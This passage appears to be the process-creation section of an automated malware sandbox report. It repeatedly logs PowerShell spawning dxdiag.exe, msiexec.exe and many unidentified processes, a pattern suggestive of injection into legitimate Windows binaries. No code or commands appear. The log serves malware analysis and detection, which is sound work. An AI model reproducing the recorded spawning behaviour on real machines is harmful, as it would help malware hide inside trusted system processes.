    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
